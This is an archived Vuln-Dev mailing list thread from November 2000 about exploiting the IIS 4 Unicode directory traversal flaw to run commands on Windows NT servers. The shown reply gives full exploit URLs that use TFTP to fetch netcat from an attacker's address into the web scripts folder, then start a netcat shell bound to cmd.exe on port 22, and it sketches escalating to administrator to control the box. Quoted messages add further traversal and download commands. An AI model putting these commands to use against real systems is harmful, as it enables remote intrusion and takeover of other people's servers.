Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: MadHat <madhat () UNSPECIFIC COM>
Date: Mon, 13 Nov 2000 12:25:37 -0600
"Loschiavo, Dave" wrote:
Thanks, looks like I inadvertantly left the "get" out of the message. I was including that in the URL when testing. However, what I did notice was the use of the quotes in the "-i" area of the URL. I was not using quotes. Will have to give that a shot.
shouldn't need the quotes, but you probably do want to tell the tftp where to put the file. When I tested this, I placed the nc.exe in the scripts dir, http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe then used http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe Unicode was still used as the scripts is usually set as script access only and not execute, if there is a cgi-bin dir with execute access this can make it alot easier for someone to abuse. If called from IE, I found that the \ don't need to be excaped, but may need to be in netscape. So after this, there is a port open (22 in this case as many admins will leave this open for SSH, but this is an NT box, which as we know rarely has SSH running on it) that I can telnet to and have a command prompt. There are plenty of ways of doing this... once on the box, use one of the exploits to get IUSER_<MACHINE>, which is who you will be, added to the local admin group, and you control the box. Basic idea for the msadc as well, or any exploit that allows for simple remote command execution.
-thanks -----Original Message----- From: Robert A. Seace To: DLoschiavo () frcc cc ca us Cc: VULN-DEV () SECURITYFOCUS COM Sent: 11/10/00 10:11 AM Subject: Re: dos commands via iis 4 (TFTP) In the profound words of Loschiavo, Dave:I tried tftp commands in the URL, formatted like this:http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe" and got nowhere, while this:http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/c+dir+c: gave me a listing of the of the c: drive. Am I formatting the "TFTP" URL incorrectly?Yeah, I think so... But, I'm no TFTP guru, either... Personally, I would just use RCP... However, looking at the original advisory on BugTraq, that mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"), I think you need a "GET" before the "nc.exe", and maybe a destination location specified after it, for where to place it on the NT box... For instance, it shows an URL of: /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n cx99.exe+c:\winnt\system32\ncx99.exe
-- MadHat at unspecific.com "The 3 great virtues of a programmer: Laziness, Impatience, and Hubris." --Larry Wall
Current thread:
- Re: dos commands via iis 4 (TFTP) Loschiavo, Dave (Nov 11)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)
- Re: dos commands via iis 4 (TFTP) dsbelile (Nov 15)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 15)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Matt Zimmerman (Nov 16)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 18)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)